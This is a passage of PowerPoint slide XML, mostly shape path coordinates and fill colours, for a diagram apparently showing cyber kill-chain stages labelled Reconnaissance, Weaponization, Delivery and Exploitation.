                    <a:pt x="202179" y="1192086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="234786" y="1223086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="269437" y="1252017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="306048" y="1278757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="344540" y="1303183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="384829" y="1325172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="426834" y="1344602"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="470474" y="1361349"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="515666" y="1375290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562328" y="1386304"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="609627" y="1394152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="656698" y="1398730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="703419" y="1400120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="749667" y="1398405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="795320" y="1393666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="840254" y="1385985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="884347" y="1375443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="927477" y="1362123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="969520" y="1346105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1010354" y="1327473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1049855" y="1306306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1087902" y="1282688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1124371" y="1256700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1159140" y="1228424"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1192086" y="1197941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1223086" y="1165334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1252017" y="1130683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1278757" y="1094072"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1303183" y="1055580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1325172" y="1015291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1344602" y="973286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1361349" y="929646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1375290" y="884454"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1386304" y="837791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1394137" y="790479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1398703" y="743395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1400084" y="696665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1398361" y="650409"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1393615" y="604751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1385929" y="559812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1375384" y="515717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1362062" y="472586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1346043" y="430544"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1327409" y="389712"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1306243" y="350213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1282625" y="312170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1256637" y="275705"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1228360" y="240941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1197877" y="208000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1165268" y="177006"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1130615" y="148080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1094000" y="121345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1055504" y="96924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1015209" y="74939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="973196" y="55513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="929546" y="38769"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="884342" y="24829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="837664" y="13815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="790366" y="5968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="743295" y="1390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696574" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="EEC78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89052" y="3232404"/>
              <a:ext cx="873251" cy="873251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1957292" y="2802305"/>
            <a:ext cx="1704339" cy="1721485"/>
            <a:chOff x="1957292" y="2802305"/>
            <a:chExt cx="1704339" cy="1721485"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="object 18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1957292" y="2802305"/>
              <a:ext cx="1704339" cy="1721485"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1704339" h="1721485">
                  <a:moveTo>
                    <a:pt x="838430" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="791496" y="2448"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="745078" y="7432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="699262" y="14897"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="654134" y="24784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="609778" y="37037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="566281" y="51599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="523728" y="68413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="482204" y="87422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441795" y="108569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="402587" y="131797"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="364664" y="157049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="328114" y="184268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="293020" y="213398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="259468" y="244380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227545" y="277159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197335" y="311677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168925" y="347877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142399" y="385703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117843" y="425097"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95342" y="466003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74983" y="508363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56850" y="552121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41030" y="597220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27607" y="643602"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16668" y="691210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8412" y="739355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2920" y="787325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135" y="835035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="882400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2457" y="929334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7450" y="975752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14923" y="1021568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24817" y="1066696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37077" y="1111052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51645" y="1154549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68464" y="1197102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87478" y="1238626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108629" y="1279035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131861" y="1318243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157116" y="1356165"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184338" y="1392716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213470" y="1427810"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244454" y="1461361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277235" y="1493285"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="311754" y="1523494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="347956" y="1551905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="385783" y="1578431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425178" y="1602987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="466084" y="1625488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="508444" y="1645847"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="552202" y="1663979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="597301" y="1679800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="643683" y="1693223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="691292" y="1704162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="739436" y="1712431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="787406" y="1717934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="835116" y="1720730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="882481" y="1720876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="929415" y="1718428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="975833" y="1713443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1021649" y="1705979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1066778" y="1696091"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1111133" y="1683838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1154630" y="1669276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1197184" y="1652462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1238707" y="1633453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1279116" y="1612306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1318324" y="1589078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1356247" y="1563826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1392798" y="1536607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1427892" y="1507478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1461443" y="1476495"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1493366" y="1443717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1523576" y="1409199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1551986" y="1372998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1578513" y="1335172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1603069" y="1295778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1625569" y="1254872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1645928" y="1212512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1664061" y="1168754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1679881" y="1123656"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1693304" y="1077274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1704244" y="1029665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="860456" y="860374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1029620" y="16713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="981475" y="8445"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="933505" y="2941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="885795" y="145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="838430" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="70BC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117625" y="2962810"/>
              <a:ext cx="1400175" cy="1400175"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1400175" h="1400175">
                  <a:moveTo>
                    <a:pt x="696665" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="650409" y="1715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="604751" y="6454"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="559812" y="14135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="515717" y="24677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="472586" y="37997"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430544" y="54015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="389712" y="72647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="350213" y="93814"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="312170" y="117432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275705" y="143420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="240941" y="171696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208000" y="202179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177006" y="234786"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148080" y="269437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121345" y="306048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96924" y="344540"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74939" y="384829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55513" y="426834"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38769" y="470474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24829" y="515666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13815" y="562328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5968" y="609627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1390" y="656698"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="703419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1715" y="749667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6454" y="795320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14135" y="840254"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24677" y="884347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37997" y="927477"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54015" y="969520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72647" y="1010354"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93814" y="1049855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117432" y="1087902"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143420" y="1124371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171696" y="1159140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202179" y="1192086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="234786" y="1223086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="269437" y="1252017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="306048" y="1278757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="344540" y="1303183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="384829" y="1325172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="426834" y="1344602"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="470474" y="1361349"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="515666" y="1375290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562328" y="1386304"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="609627" y="1394152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="656698" y="1398730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="703419" y="1400120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="749667" y="1398405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="795320" y="1393666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="840254" y="1385985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="884347" y="1375443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="927477" y="1362123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="969520" y="1346105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1010354" y="1327473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1049855" y="1306306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1087902" y="1282688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1124371" y="1256700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1159140" y="1228424"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1192086" y="1197941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1223086" y="1165334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1252017" y="1130683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1278757" y="1094072"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1303183" y="1055580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1325172" y="1015291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1344602" y="973286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1361349" y="929646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1375290" y="884454"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1386304" y="837791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1394152" y="790479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1398730" y="743395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1400120" y="696665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1398405" y="650409"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1393666" y="604751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1385985" y="559812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1375443" y="515717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1362123" y="472586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1346105" y="430544"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1327473" y="389712"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1306306" y="350213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1282688" y="312170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1256700" y="275705"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1228424" y="240941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1197941" y="208000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1165334" y="177006"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1130683" y="148080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1094072" y="121345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1055580" y="96924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1015291" y="74939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="973286" y="55513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="929646" y="38769"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="884454" y="24829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="837791" y="13815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="790479" y="5968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="743395" y="1390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696665" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="31736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66772" y="3229356"/>
              <a:ext cx="862584" cy="861060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652777" y="4684014"/>
            <a:ext cx="210375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Reconnaissance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22189" y="4684014"/>
            <a:ext cx="197231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Weaponiza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t</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="90">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>ion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338564" y="4701921"/>
            <a:ext cx="107696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Del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i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v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e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ry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653264" y="4707128"/>
            <a:ext cx="157035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Exploitation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826554" y="6093256"/>
            <a:ext cx="1704339" cy="1721485"/>
            <a:chOff x="6826554" y="6093256"/>
            <a:chExt cx="1704339" cy="1721485"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="object 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6826554" y="6093256"/>
              <a:ext cx="1704339" cy="1721485"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1704340" h="1721484">
                  <a:moveTo>
                    <a:pt x="838475" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="791541" y="2448"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="745124" y="7433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="699308" y="14898"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="654179" y="24787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="609824" y="37041"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="566327" y="51604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="523773" y="68420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="482250" y="87431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441841" y="108580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="402632" y="131811"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="364710" y="157066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="328159" y="184289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="293065" y="213423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="259514" y="244410"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227591" y="277194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197381" y="311718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168970" y="347925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142444" y="385758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117888" y="425160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95388" y="466075"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75029" y="508444"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56896" y="552212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41076" y="597322"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27653" y="643716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16713" y="691337"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8445" y="739481"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2941" y="787451"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145" y="835162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="882527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2448" y="929461"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7432" y="975879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14897" y="1021694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24784" y="1066823"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37037" y="1111178"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51599" y="1154676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68413" y="1197229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87422" y="1238753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108569" y="1279161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131797" y="1318370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157049" y="1356292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184268" y="1392843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213398" y="1427937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244380" y="1461488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277159" y="1493411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="311677" y="1523621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="347877" y="1552032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="385703" y="1578558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425097" y="1603114"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="466003" y="1625614"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="508363" y="1645973"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="552121" y="1664106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="597220" y="1679927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="643602" y="1693349"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="691210" y="1704289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="739355" y="1712551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="787325" y="1718048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="835035" y="1720837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="882400" y="1720977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="929334" y="1718522"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="975752" y="1713531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1021568" y="1706060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1066696" y="1696167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1111052" y="1683908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1154549" y="1669340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1197102" y="1652520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1238626" y="1633506"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1279035" y="1612353"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1318243" y="1589120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1356165" y="1563863"/>
                  </a:lnTo>
